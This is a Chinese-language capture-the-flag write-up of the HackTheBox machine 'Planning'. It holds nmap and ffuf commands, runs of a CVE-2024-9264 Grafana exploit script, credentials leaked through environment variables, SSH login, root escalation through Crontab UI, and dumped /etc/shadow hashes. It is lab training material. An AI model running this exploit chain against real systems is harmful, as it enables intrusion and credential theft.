基本信息

1
As is common in real life pentests, you will start the Planning box with credentials for the following account: admin / 0D5oT70Fq13EvB5r

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.11.68
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 16:07 JST
Nmap scan report for 10.10.11.68
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 62:ff:f6:d4:57:88:05:ad:f4:d3:de:5b:9b:f8:50:f1 (ECDSA)
|_  256 4c:ce:7d:5c:fb:2d:a0:9e:9f:bd:f5:5c:5e:61:50:8a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://planning.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.58 seconds

80

需要加hosts:

1
10.10.11.68 planning.htb

在线教育相关的:

子域名扫描

需要一个比较大的字典,可以找到grafana:

1
2
3
ffuf -w /Users/miao/Tools/dict/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -u "http://planning.htb/" -H 'Host: FUZZ.planning.htb' -fs 178

grafana                 [Status: 302, Size: 29, Words: 2, Lines: 3, Duration: 181ms]

就是一个grafana:

grafana

使用一开始给出的账号密码登录,是Grafana v11.0.0:

1
2
admin
0D5oT70Fq13EvB5r

CVE-2024-9264

搜索可以发现相关漏洞:

显示是root,实际是一个容器

1
python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c id http://grafana.planning.htb

env

环境变量中可以得到用户名和密码

1
2
3
4
python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c env http://grafana.planning.htb

GF_SECURITY_ADMIN_PASSWORD=RioTecRANDEntANT!
GF_SECURITY_ADMIN_USER=enzo

user flag

得到的用户名和密码ssh登录:

1
2
ssh enzo@10.10.11.68
RioTecRANDEntANT!

Crontab UI

查看端口可以发现一个本地8000端口,转发出来需要登录,常规翻文件可以找到一个密码,登录上去是Crontab UI:

1
2
3
# 用户名简单猜一下即可
root
P4ssw0rdS0pRi0T3c

Crontab to root

所以就是新增一个crontab执行即可:

shadow

1
2
root:$y$j9T$6FXR7mi4BgmaZ7AoBiO470$CBrVTY4d7EK5JUjv8Gc2xjGVxYIr14TUCRkgFY0YvB7:20147:0:99999:7:::
enzo:$y$j9T$D.g0svThdX4dAVCvkaUz3.$jQKKPCGVxCt3NiPX9fCUSzSWXg8V2V6xKvGyhv2yiX.:20147:0:99999:7:::

参考资料